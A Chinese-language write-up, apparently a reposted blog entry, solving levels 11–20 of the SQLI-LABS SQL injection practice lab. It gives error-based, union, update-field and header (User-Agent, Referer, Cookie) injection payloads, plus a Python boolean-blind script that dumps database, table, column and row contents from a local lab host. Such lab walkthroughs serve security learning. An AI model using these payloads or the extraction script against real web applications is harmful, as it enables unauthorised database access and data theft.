2. 程式人生 > 資料庫 >SQLI-LABS Page1 11-20

SQLI-LABS Page1 11-20

阿新 發佈:2020-12-27

0x0B Less-11

報錯注入,只是注入方式為POST,可以直接使用報錯函式進行注入,也可以使用常規方法

  • 報錯注入,之後更改注入語句即可
    在這裡插入圖片描述
uname=admin' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=123&submit=Submit
  • 常規注入
uname=admin' order by 2#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=(database()))#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#&passwd=123&submit=Submit

0x0C Less-12

根據報錯資訊,得到分界符為"),其餘操作如Less-11

0x0D Less-13

根據報錯判斷分界符'),可以直接使用報錯注入,回顯無搜尋的列,可使用bool盲注

  • bool盲注
import requests

url = "http://192.168.44.214/sqli-labs/Less-13/"
_columns = []
_tables = []
_database = ""
resolver = "')"

data = {
    "uname":"1",
    "passwd":"123",
    "submit":"Submit"
}

def binarySearch(payload):
    maxn = 144
    minn = 1
    while minn<=maxn:
        middle = (maxn+minn)//2
        payload1 = payload+">"+str(middle)+"#"
        data['uname'] = payload1
        #print(payload1)
        #exit(0)
        r = requests.post(url, data=data)
        # print(r.text)
        # exit(0)
        if "slap.jpg" in r.text:
            maxn = middle-1
        else:
            minn = middle+1
    return minn

def getLength(func):
    payload1 = resolver+" or length({})".format(func)
    return binarySearch(payload1)

def getStr(func, length):
    mstr = ""
    for i in range(1,length+1):
        payload = resolver+" or ascii(substr({},{},1))".format(func,i)
        tmp = binarySearch(payload)
        mstr += chr(tmp)
        #print(mstr)
    return mstr
def getDatabase():
    global _database
    func = "database()"
    result = getStr(func, getLength(func))
    print("[*] database: "+result)
    _database = result

def getTaleNUM(database):
    func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    print(length)
    result = getStr(func, length)
    print("[*] table num ="+result)

def getTales(database):
    global _tables
    func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database)
    length = getLength(func)
    result = getStr(func, length)
    _tables = result.split(',')
    print("[*] tables: "+result)

def getColumns(table, database):
    global _columns
    func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database)
    length = getLength(func)
    #print(length)
    result = getStr(func, length)
    _columns = result.split(",")
    print("[*] columns from {}:".format(table)+result)

def getInformation(table, column):
    Info = {}
    for i in column:
        func = "(select group_concat({}) from {})".format(i, table)
        length = getLength(func)
        #print(length)
        result = getStr(func, length)
        Info[i] = result.split(',')
        #print(result)
        #print(Info[i])
    for i in range(len(Info[column[0]])):
        mstr = ""
        for j in column:
            mstr += Info[j][i]
            mstr += "   "
        print(mstr)


if __name__ == "__main__":
    getDatabase()
    getTales(_database)
    getColumns(_tables[0],_database)
    getInformation(_tables[0], _columns)

0x0E Less-14

根據報錯,判斷分界符為",指令碼和前一題一樣

0x0F Less-15

無報錯資訊,嘗試萬能密碼成功進入,可使用Less-13指令碼進行布林盲注,將分解符替換為'

0x10 Less-16

更改Less-13指令碼的分界符為")

0x11 Less-17

passwd能夠報錯,可以參照Less-11的報錯注入,當然,還有其他做法,還可以使用二次注入,利用欄位更新將sql語句的結果寫入欄位後,讀取獲得。

  • 報錯注入
    在這裡插入圖片描述
  • 利用資料更新
    當沒有報錯資訊時,可用嘗試插入一些sql語句,語句執行後,將所需要的資料儲存到欄位之中,通過檢視欄位得到資訊。
    在這裡插入圖片描述
    uname=admin&passwd=',password=database(),username='admin&submit=Submit
    提交以上語句,將資料庫名儲存到admin的密碼中,再去能檢視密碼的關卡查詢:
    在這裡插入圖片描述
    的到相關資訊
    完整查詢語句:
uname=admin&passwd=',password=database(),username='admin&submit=Submit
查詢表名:
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),1,10),username='admin&submit=Submit
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),11,25),username='admin&submit=Submit
查詢列名以及資訊,和之前關卡一樣,需要注意的是欄位能儲存的資料長度有限制,需要分多次查詢

0x12 Less-18

隨手登入一個賬號,發現顯示了UA的資訊,並嘗試更改UA,發現資訊改變,可能為UA注入

在這裡插入圖片描述
單引號UA報錯,可以使用報錯注入,注意原始碼中此處資料為插入資料,需要閉合括號。
payload:

1',1,updatexml(1,concat(0x7e,(database()),0x7e),1))#

在這裡插入圖片描述

0x13 Less-19

登入之後顯示reffer,輸入單引號,報錯,只是位置換了,其餘和Less-18一樣
在這裡插入圖片描述

0x14 Less-20

登入之後檢視cookie
在這裡插入圖片描述
在這裡插入圖片描述
嘗試單引號,報錯,嘗試報錯注入,成功拿取資料
在這裡插入圖片描述
聯合注入:

Cookie: uname=admin1' order by 4# 獲取列數
Cookie: uname=adm' union select 1,2,database()#  獲取資料庫
Cookie: uname=adm' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

相關推薦

SQLI-LABS Page1 11-20

0x0B Less-11 報錯注入,只是注入方式為POST,可以直接使用報錯函式進行注入,也可以使用常規方法

sqli-labs11-20

less-11 本關還可以使用union聯合查詢注入和盲注 (1)使用burpsuite抓包,修改引數構造payload。

sqli-labs靶場11-12關(基於POST聯合查詢)

1:GET 2:POST 3:Head 4:Put 5:Delete 6:Connect 7:Options 8:Trace 那麼這裡是典型的POST注入,那麼注入點就是在POST資料中,而POST請求往往代表著使用者向伺服器提交了大量的資料請求,行為有包括檔案上傳,

sqli-labs闖關(11-20)

sqli-labs闖關(11-20) less-11 1、11-20關都為post傳遞,我們可以使用burp抓包來修改post提交的資料。

sqli-labs 20-22 --cookie注入

異常處理 一開始開啟這個題目的時候找不到cookie... 登入成功就是沒有cookie cookie注入沒有cookie...

Upload-labs-11-20

0x11 pass-11 原始碼: $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

sqli-labs less13-20(各種post型頭部注入)

less-13 POST型雙查詢注入 less-14 POST型雙查詢注入 less-15 POST型布林注入 less-16 POST型布林注入

sqli-labs闖關筆記-less1-20---介面報錯分析

less-1——基於單引號的字元型注入 SELECT * FROM users WHERE id=\'1\'\' LIMIT 0,1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right sy

Sqli-Labs Less12:POST注入

開啟bp抓包 傳送至Repeater,新增 \\ 進行測試 根據報錯:222\") 猜測查詢語句: select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sqli-labs個人注入心得

閉合方式型別都有一般是’,\",或 無閉合符號 或 \'),\") Less-1 嘗試?id=1 註釋符號為–+、-- 、#。

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

sqli-labs 18-19 --Header_injection

sqli-labs 18 知識點 頭部注入 報錯注入 使用的函式: updatexml (XML_document, XPath_string, new_value);

sqli-labs第十八題

檢視題目 基於錯誤的請求頭注入 一個登入表單,顯示了ip地址。 測試一通毫無頭緒。。。看看原始碼

個人珍藏的80道多執行緒併發面試題(11-20答案解析)

前言 個人珍藏的80道Java多執行緒/併發經典面試題,現在給出11-20的答案解析哈,並且上傳github哈~

Sqli-labs 1-10

Less 1-4(基礎注入) 基礎知識: table_schema:資料庫的名稱 table_name:表的名稱 column_name:列的名稱

sqli-labs第七關

1、首先判斷注入點 正常顯示是這樣的不正常顯示是這樣的猜到最後,注入點是字元型,單引號加兩個小括號,?id=1’)) – -因為它只有正常顯示和不正常顯示兩種狀態,並且也沒有MySQL的報錯資訊。正常來說,這

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式,頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式,頭部 Referer: 注入 Less-18 / Less-19 方

SQLI-LABS靶場環境搭建詳細流程

準備工作 需要虛擬機器一臺: 我用的是Win2008R2企業版 Web容器: phpstudy2016 額外需要安裝VC9_x86 32位 為了配合phpstudy2016版本中版本較低的php環境, 所以需要提前安裝好32位的VC9

sqli-labs 21-37關卡

less 21 “基於’)字元型的Cookie注入” 注入語句: 1’) union select 1,database(),3# 編碼:MScpIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCksMyM=